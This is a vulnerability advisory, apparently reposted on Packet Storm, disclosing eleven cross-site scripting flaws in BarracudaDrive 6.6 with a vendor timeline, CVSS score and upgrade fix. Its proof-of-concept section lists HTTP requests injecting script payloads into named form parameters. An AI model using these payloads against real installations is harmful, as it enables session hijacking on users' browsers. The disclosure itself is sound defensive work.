BarracudaDrive 6.6 Cross Site Scripting

2014-03-18T00:00:00
ID PACKETSTORM:125766
Type packetstorm
Reporter Prabhu S Angadi
Modified 2014-03-18T00:00:00

Description

                                        
                                            `##############################################################################  
#  
# Title : BarracudaDrive Multiple XSS Vulnerabilities  
# Author : Prabhu S Angadi SecPod Technologies Pvt. Ltd. http://www.secpod.com  
# Vendor : http://barracudadrive.com  
# Advisory : http://secpod.org/blog/?p=2158  
# http://secpod.org/advisories/SecPod_BarracudaDrive_Mult_XSS_Vuln.txt  
# Software : BarracudaDrive 6.6  
# Date : 24/02/2014  
#  
##############################################################################  
  
SecPod ID: 1049 24/02/2014 Issue Discovered  
07/03/2014 Vendor Notified  
07/03/2014 Vendor Responded  
13/03/2014 Vendor Solution  
17/03/2014 Advisory Released  
  
  
Class: Cross-Site Scripting Severity: Medium  
  
  
Overview:  
---------  
BarracudaDrive Multiple Reflected Cross-site Scripting Vulnerabilities.  
  
  
Technical Description:  
----------------------  
  
Multiple Reflected Cross-Site Scripting vulnerabilities are present in  
BarracudaDrive, as it fails to properly sanitize user-supplied input.  
  
1) Input passed via the 'sForumName', 'sDescription' parameters in  
'/Forum/manage/ForumManager.lsp?nForumId=1' are not properly verified   
before it is returned to the user. This can be exploited to execute   
arbitrary HTML and script code in a user's browser session in the context   
of a vulnerable site.  
  
2) Input passed via the 'sHint', 'sWord' parameters in   
'/Forum/manage/hangman.lsp?nId=1' are not properly verified   
before it is returned to the user. This can be exploited to execute   
arbitrary HTML and script code in a user's browser session in the context   
of a vulnerable site.  
  
3) Input passed via the 'nId' parameter in '/Forum/manage/hangman.lsp' are   
not properly verified before it is returned to the user. This can be   
exploited to execute arbitrary HTML and script code in a user's browser   
session in the context of a vulnerable site.  
  
4) Input passed via the 'sForumName', 'sDescription' parameters in   
'/Forum/manage/ForumManager.lsp?newforum=true' are not properly verified   
before it is returned to the user. This can be exploited to execute   
arbitrary HTML and script code in a user's browser session in the context   
of a vulnerable site.  
  
5) Input passed via the 'user' parameter in   
'/rtl/protected/admin/wizard/setuser.lsp' are not properly verified   
before it is returned to the user. This can be exploited to execute   
arbitrary HTML and script code in a user's browser session in the context   
of a vulnerable site.  
  
6) Input passed via the 'name', 'email' parameter in '/feedback.lsp'   
are not properly verified before it is returned to the user.   
This can be exploited to execute arbitrary HTML and script code in a   
user's browser session through '/private/manage/messages.lsp' or   
'/private/manage/messages.lsp?key=1' URIs in the context of a   
vulnerable site.  
  
7) Input passed via the 'lname', 'url' parameters in   
'/private/manage/PageManager.lsp?parent=0&newpage=true' are not properly   
verified before it is returned to the user. This can be exploited to   
execute arbitrary HTML and script code in a user's browser session in the   
context of a vulnerable site.  
  
8) Input passed via the 'lname', 'url' parameters in   
'/private/manage/PageManager.lsp?parent=0&edit=9' are not properly   
verified before it is returned to the user. This can be exploited to   
execute arbitrary HTML and script code in a user's browser session in the   
context of a vulnerable site.  
  
9) Input passed via the 'cmd' parameter in '/fs' is not properly verified   
before it is returned to the user. This can be exploited to execute   
arbitrary HTML and script code in a user's browser session in the context   
of a vulnerable site.  
  
10) Input passed via the 'newname', 'description' parameters in   
'/rtl/protected/mail/manage/list.lsp' are not properly verified before   
it is returned to the user. This can be exploited to execute arbitrary   
HTML and script code in a user's browser session in the context of a   
vulnerable site.  
  
11) Input passed via the 'firstname', 'lastname', 'id' parameters in   
'/rtl/protected/mail/manage/list.lsp?name=test' are not properly verified   
before it is returned to the user. This can be exploited to execute   
arbitrary HTML and script code in a user's browser session in the context   
of a vulnerable site.  
  
The vulnerability has been tested in BarracudaDrive 6.6. Other versions may   
also be affected.  
  
  
Impact:  
--------  
Successful exploitation allows an authenticated attacker to execute arbitrary   
HTML and script code in a user's browser session in the context of a   
vulnerable site.  
  
  
Affected Software:  
------------------  
BarracudaDrive 6.6  
  
Tested on,  
BarracudaDrive 6.6 on Windows OS  
BarracudaDrive 6.6 on Linux OS  
  
  
References:  
-----------  
http://secpod.org/blog/?p=2158  
http://secpod.org/advisories/SecPod_BarracudaDrive_Mult_XSS_Vuln.txt  
  
  
Proof of Concept:  
----------------  
1) POST /Forum/manage/ForumManager.lsp?nForumId=1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/Forum/manage/ForumManager.lsp?nForumId=1  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 170  
  
Post Data :   
==========  
nSortOrder=0&sForumName=<script>alert(document.cookie)</script>&sDescription=<script>alert(document.cookie)</script>&deleteforum=no&nForumId=1  
  
2) POST /Forum/manage/hangman.lsp?nId=1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/Forum/manage/hangman.lsp?nId=1  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 135  
  
Post Data :   
===========  
sHint=<script>alert(document.cookie)</script>&sWord=<script>alert(document.cookie)</script>&save=Save&nId=1  
  
3) GET /Forum/manage/hangman.lsp?nId=<script>alert(document.cookie)</script>   
(With atleast single entry in the table of Word Manager)  
  
4) POST /Forum/manage/ForumManager.lsp?newforum=true  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/Forum/manage/ForumManager.lsp?newforum=true  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 171  
  
Post Data :   
==========  
nSortOrder=0&sForumName=<script>alert(document.cookie)</script>&sDescription=<script>alert(document.cookie)</script>&deleteforum=no&nForumId=-1  
  
5) POST /rtl/protected/admin/wizard/setuser.lsp  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/rtl/protected/admin/wizard/setuser.lsp  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 92  
  
Post Data :   
==========  
user=<script>alert(document.cookie)</script>&password=test&path=/c/bdusers  
  
6) POST /feedback.lsp  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/Contact-Us.html  
Cookie: z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 226  
  
Post Data :  
==========  
name=<script>alert(document.cookie)</script>&email=<script>alert(document.cookie)</script>&message=test&k1=1393176261&k2=652054939&ck1=JBxYStg2gm3CuvlMdKlxsA==&ck2=JxxfTNM1hm7Nu/YxAAAAAA==  
  
Effect will on:  
/private/manage/messages.lsp  
/private/manage/messages.lsp?key=1  
  
7) POST /private/manage/PageManager.lsp?parent=0&newpage=true  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/private/manage/PageManager.lsp?parent=0&newpage=true  
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 158  
  
Post Data :   
==========  
position=0&lname=<script>alert(document.cookie)</script>&url=<script>alert(document.cookie)</script>&deletepage=no&parent=0&key=-1  
  
8) POST /private/manage/PageManager.lsp?parent=0&edit=9  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/private/manage/PageManager.lsp?parent=0&edit=9  
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 174  
  
Post Data :   
===========  
position=0&lname=<script>alert(document.cookie)</script>&url=<script>alert(document.cookie)</script>&cancel=Cancel&deletepage=no&parent=0&key=9  
  
Effects will be on: /private/manage/PageManager.lsp  
  
9) GET /fs/?cmd=<script>alert(document.cookie)</script>  
  
10) POST /rtl/protected/mail/manage/list.lsp  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/rtl/protected/mail/manage/list.lsp  
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 99  
  
Post Data :   
===========  
newname=<script>alert(document.cookie)</script>&description=<script>alert(document.cookie)</script>&save=Create+New+List  
  
Effect will be on '/rtl/protected/mail/manage/lists.lsp'  
  
11) POST /rtl/protected/mail/manage/list.lsp?name=test  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/rtl/protected/mail/manage/list.lsp?name=test  
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 259  
  
Post Data :   
==========  
listkey=2&email=test123@gmail.com&firstname=<script>alert(document.cookie)</script>&lastname=<script>alert(document.cookie)</script>&id=<script>alert(document.cookie)</script>&addsub=save&name=test&offset=0&save=Save  
  
12) GET /fs/<script>alert(document.cookie)</script>   
  
  
Solution:  
----------  
Upgrade to BarracudaDrive 6.7  
  
  
Risk Factor:  
-------------  
CVSS Score Report:   
ACCESS_VECTOR = NETWORK   
ACCESS_COMPLEXITY = MEDIUM   
AUTHENTICATION = SINGLE INSTANCE   
CONFIDENTIALITY_IMPACT = NONE   
INTEGRITY_IMPACT = PARTIAL   
AVAILABILITY_IMPACT = NONE   
EXPLOITABILITY = PROOF_OF_CONCEPT   
REMEDIATION_LEVEL = UNAVAILABLE   
REPORT_CONFIDENCE = CONFIRMED   
CVSS Base Score = 3.5 (AV:N/AC:M/Au:SI/C:N/I:P/A:N)   
CVSS Temporal Score = 3.1   
Risk factor = Medium   
  
  
Credits:  
--------  
Author Prabhu S Angadi of SecPod Technologies has been credited with the   
discovery of this vulnerability.  
`